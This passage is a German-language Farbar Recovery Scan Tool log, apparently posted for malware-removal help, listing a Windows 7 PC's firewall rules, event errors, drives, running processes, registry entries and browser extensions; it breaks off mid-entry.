[{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program 
Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query 
User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{1AFD0420-A3E2-4D4C-89BF-9175F1E06A0C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/23/2015 04:42:41 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Programm firefox.exe, Version 40.0.3.5716 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen. 
Prozess-ID: 15dc Startzeit: 01d0f4e91e3afce0 Endzeit: 175 Anwendungspfad: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Berichts-ID: bfe47101-619c-11e5-bda6-001e8c09ea3d Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 15382 Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 15382 Error: (09/22/2015 07:13:53 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 14383 Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 14383 Error: (09/22/2015 07:13:52 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 13385 Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 13385 Error: (09/22/2015 07:13:51 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Systemfehler: ============= CodeIntegrity: =================================== Date: 2015-09-21 18:26:06.410 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. 
Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-21 18:26:06.394 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. 
Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. ==================== Speicherinformationen =========================== Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+ Prozentuale Nutzung des RAM: 47% Installierter physikalischer RAM: 4094.49 MB Verfügbarer physikalischer RAM: 2167.05 MB Summe virtueller Speicher: 8187.13 MB Verfügbarer virtueller Speicher: 5641.07 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:186.31 GB) (Free:70.02 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)] Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D) Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C) Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015
durchgeführt von Kenny G (Administrator) auf KENNYG-PC (23-09-2015 04:59:45)
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser & (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 8 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs
(CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Malwarebytes Corporation) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.)
HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_13_0_0_214_Plugin.exe -update plugin HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: 
{56afb9cd-5a71-11e3-957d-001e8c09ea3d} - F:\iStudio.exe SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um 
einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-682121585-3582832733-1082443493-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp 
HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {EAE34A3D-27B1-4773-A9EC-88E5068C2C50} URL = hxxps://www.google.com/search?q={searchTerms} BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll 
[2009-07-14] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) 
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08] FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22] FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com Chrome: ======= CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/" CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16] CHR Extension: (YouTube) - 
C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16] CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16] CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16] CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15] CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26] CHR Extension: (Google Wallet) - C:\Users\Kenny 